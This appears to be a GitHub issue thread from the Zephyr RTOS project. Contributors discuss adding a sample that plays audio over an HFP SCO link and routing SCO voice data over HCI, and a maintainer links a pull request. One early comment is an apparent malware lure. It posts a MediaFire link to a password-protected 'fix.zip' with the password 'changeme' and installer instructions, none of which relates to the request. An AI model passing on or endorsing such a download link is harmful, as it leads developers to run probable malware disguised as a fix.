zephyrproject-rtos/zephyr #77667: add sample about sco audio path to play audio like a2dp

caogule, 2024-08-28:
This example HFP AG only implements the sco service-level connection,could you create an soc audio path to play music?Be grateful.

royalkush, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

hongshui3000, 2025-09-08:
Another possibility is to implement it similar to btstack:
                                  SCO Data is be routed over HCI with `ENABLE_SCO_OVER_HCI`

lylezhu2012, 2025-09-08:
> Another possibility is to implement it similar to btstack: SCO Data is be routed over HCI with `ENABLE_SCO_OVER_HCI` Good for msbc coded speech processing

Do you mean the SCO stream data is transferred over HCI instead of PCM pins of controller?

lylezhu2012, 2026-09-30:
I created a PR https://github.com/zephyrproject-rtos/zephyr/pull/118609 to enable voice over HCI.